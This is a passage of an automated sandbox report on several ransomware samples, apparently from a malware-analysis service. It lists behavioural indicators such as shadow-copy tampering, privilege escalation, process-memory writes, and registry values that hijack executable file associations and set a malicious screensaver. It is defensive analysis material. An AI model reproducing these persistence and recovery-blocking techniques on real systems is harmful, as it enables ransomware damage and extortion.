HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SMSS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language arp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINLOGON.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IExplorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MediaFoundation.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language huter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LSASS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SERVICES.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CSRSS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mountvol.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 1496 net.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3684 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1680 taskkill.exe -
Modifies Control Panel 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Mig~mig.SCR" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4740 7zFM.exe 900 taskmgr.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 6500 Process not Found 6476 Process not Found 5224 Process not Found 6516 Process not Found 6524 Process not Found 3916 Process not Found 6776 Process not Found 6468 Process not Found 1052 Process not Found 5148 Process not Found 3504 Process not Found 5588 Process not Found 1180 Process not Found 5212 Process not Found 3508 Process not Found 3516 Process not Found 6628 Process not Found 1460 Process not Found 2272 Process not Found 4356 Process not Found 8 Process not Found 3404 Process not Found 4040 Process not Found 6684 Process not Found 4376 Process not Found 5988 Process not Found 6224 Process not Found 2308 Process not Found 280 Process not Found 6248 Process not Found 5340 Process not Found 1196 Process not Found 5384 Process not Found 6440 Process not Found 6456 Process not Found 4876 Process not Found 1432 Process not Found 6068 Process not Found 6396 Process not Found 6256 Process not Found 2212 Process not Found 6064 Process not Found 4700 Process not Found 5020 Process not Found 6044 Process not Found 5788 Process not Found 6296 Process not Found 6320 Process not Found 288 Process not Found 6260 Process not Found 5432 Process not Found 3076 Process not Found 4056 Process not Found 4344 Process not Found 5708 Process not Found 4012 Process not Found 4076 Process not Found 4048 Process not Found 4264 Process not Found 4148 Process not Found 4164 Process not Found 4184 Process not Found 4252 Process not Found 4268 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4740 7zFM.exe Token: 35 4740 7zFM.exe Token: SeSecurityPrivilege 4740 7zFM.exe Token: SeDebugPrivilege 3704 taskmgr.exe Token: SeSystemProfilePrivilege 3704 taskmgr.exe Token: SeCreateGlobalPrivilege 3704 taskmgr.exe Token: SeDebugPrivilege 900 taskmgr.exe Token: SeSystemProfilePrivilege 900 taskmgr.exe Token: SeCreateGlobalPrivilege 900 taskmgr.exe Token: 33 3704 taskmgr.exe Token: SeIncBasePriorityPrivilege 3704 taskmgr.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe Token: SeDebugPrivilege 540 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe Token: SeDebugPrivilege 1052 HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe Token: SeTakeOwnershipPrivilege 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe Token: SeDebugPrivilege 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeBackupPrivilege 5592 vssvc.exe Token: SeRestorePrivilege 5592 vssvc.exe Token: SeAuditPrivilege 5592 vssvc.exe Token: SeIncreaseQuotaPrivilege 6980 WMIC.exe Token: SeSecurityPrivilege 6980 WMIC.exe Token: SeTakeOwnershipPrivilege 6980 WMIC.exe Token: SeLoadDriverPrivilege 6980 WMIC.exe Token: SeSystemProfilePrivilege 6980 WMIC.exe Token: SeSystemtimePrivilege 6980 WMIC.exe Token: SeProfSingleProcessPrivilege 6980 WMIC.exe Token: SeIncBasePriorityPrivilege 6980 WMIC.exe Token: SeCreatePagefilePrivilege 6980 WMIC.exe Token: SeBackupPrivilege 6980 WMIC.exe Token: SeRestorePrivilege 6980 WMIC.exe Token: SeShutdownPrivilege 6980 WMIC.exe Token: SeDebugPrivilege 6980 WMIC.exe Token: SeSystemEnvironmentPrivilege 6980 WMIC.exe Token: SeRemoteShutdownPrivilege 6980 WMIC.exe Token: SeUndockPrivilege 6980 WMIC.exe Token: SeManageVolumePrivilege 6980 WMIC.exe Token: 33 6980 WMIC.exe Token: 34 6980 WMIC.exe Token: 35 6980 WMIC.exe Token: 36 6980 WMIC.exe Token: SeIncreaseQuotaPrivilege 6980 WMIC.exe Token: SeSecurityPrivilege 6980 WMIC.exe Token: SeTakeOwnershipPrivilege 6980 WMIC.exe Token: SeLoadDriverPrivilege 6980 WMIC.exe Token: SeSystemProfilePrivilege 6980 WMIC.exe Token: SeSystemtimePrivilege 6980 WMIC.exe Token: SeProfSingleProcessPrivilege 6980 WMIC.exe Token: SeIncBasePriorityPrivilege 6980 WMIC.exe Token: SeCreatePagefilePrivilege 6980 WMIC.exe Token: SeBackupPrivilege 6980 WMIC.exe Token: SeRestorePrivilege 6980 WMIC.exe Token: SeShutdownPrivilege 6980 WMIC.exe Token: SeDebugPrivilege 6980 WMIC.exe Token: SeSystemEnvironmentPrivilege 6980 WMIC.exe Token: SeRemoteShutdownPrivilege 6980 WMIC.exe Token: SeUndockPrivilege 6980 WMIC.exe Token: SeManageVolumePrivilege 6980 WMIC.exe Token: 33 6980 WMIC.exe Token: 34 6980 WMIC.exe Token: 35 6980 WMIC.exe Token: 36 6980 WMIC.exe Token: SeBackupPrivilege 6924 wbengine.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4740 7zFM.exe 4740 7zFM.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 3704 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe 900 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 3548 Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe 4108 cmd.exe 5916 xk.exe 5468 IExplorer.exe 6276 WINLOGON.EXE 5248 CSRSS.EXE 6668 SERVICES.EXE 5404 LSASS.EXE 6200 SMSS.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3704 wrote to memory of 900 3704 taskmgr.exe 97 PID 3704 wrote to memory of 900 3704 taskmgr.exe 97 PID 4640 wrote to memory of 4108 4640 powershell.exe 103 PID 4640 wrote to memory of 4108 4640 powershell.exe 103 PID 4108 wrote to memory of 4384 4108 cmd.exe 105 PID 4108 wrote to memory of 4384 4108 cmd.exe 105 PID 4108 wrote to memory of 4696 4108 cmd.exe 106 PID 4108 wrote to memory of 4696 4108 cmd.exe 106 PID 4108 wrote to memory of 4696 4108 cmd.exe 106 PID 4108 wrote to memory of 540 4108 cmd.exe 107 PID 4108 wrote to memory of 540 4108 cmd.exe 107 PID 4108 wrote to memory of 540 4108 cmd.exe 107 PID 4108 wrote to memory of 4776 4108 cmd.exe 108 PID 4108 wrote to memory of 4776 4108 cmd.exe 108 PID 4108 wrote to memory of 4776 4108 cmd.exe 108 PID 4108 wrote to memory of 3156 4108 cmd.exe 109 PID 4108 wrote to memory of 3156 4108 cmd.exe 109 PID 4108 wrote to memory of 4312 4108 cmd.exe 110 PID 4108 wrote to memory of 4312 4108 cmd.exe 110 PID 4108 wrote to memory of 4312 4108 cmd.exe 110 PID 4108 wrote to memory of 3772 4108 cmd.exe 111 PID 4108 wrote to memory of 3772 4108 cmd.exe 111 PID 4108 wrote to memory of 3772 4108 cmd.exe 111 PID 4108 wrote to memory of 1052 4108 cmd.exe 114 PID 4108 wrote to memory of 1052 4108 cmd.exe 114 PID 4108 wrote to memory of 3944 4108 cmd.exe 116 PID 4108 wrote to memory of 3944 4108 cmd.exe 116 PID 4108 wrote to memory of 3944 4108 cmd.exe 116 PID 4108 wrote to memory of 3328 4108 cmd.exe 117 PID 4108 wrote to memory of 3328 4108 cmd.exe 117 PID 4108 wrote to memory of 3328 4108 cmd.exe 117 PID 4108 wrote to memory of 3548 4108 cmd.exe 118 PID 4108 wrote to memory of 3548 4108 cmd.exe 118 PID 4108 wrote to memory of 3548 4108 cmd.exe 118 PID 4108 wrote to memory of 1840 4108 cmd.exe 119 PID 4108 wrote to memory of 1840 4108 cmd.exe 119 PID 4108 wrote to memory of 1840 4108 cmd.exe 119 PID 4108 wrote to memory of 2272 4108 cmd.exe 121 PID 4108 wrote to memory of 2272 4108 cmd.exe 121 PID 4108 wrote to memory of 2272 4108 cmd.exe 121 PID 1052 wrote to memory of 244 1052 HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe 124 PID 1052 wrote to memory of 244 1052 HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe 124 PID 1052 wrote to memory of 244 1052 HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe 124 PID 2272 wrote to memory of 1680 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 128 PID 2272 wrote to memory of 1680 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 128 PID 2272 wrote to memory of 1680 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 128 PID 3944 wrote to memory of 3204 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 129 PID 3944 wrote to memory of 3204 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 129 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 2272 wrote to memory of 2092 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 134 PID 2272 wrote to memory of 2092 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 134 PID 2272 wrote to memory of 2092 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 134 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3328 wrote to memory of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 3204 wrote to memory of 3684 3204 cmd.exe 136 PID 3204 wrote to memory of 3684 3204 cmd.exe 136 PID 4480 wrote to memory of 6048 4480 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 142 -
System policy modification 1 TTPs 6 IoCs
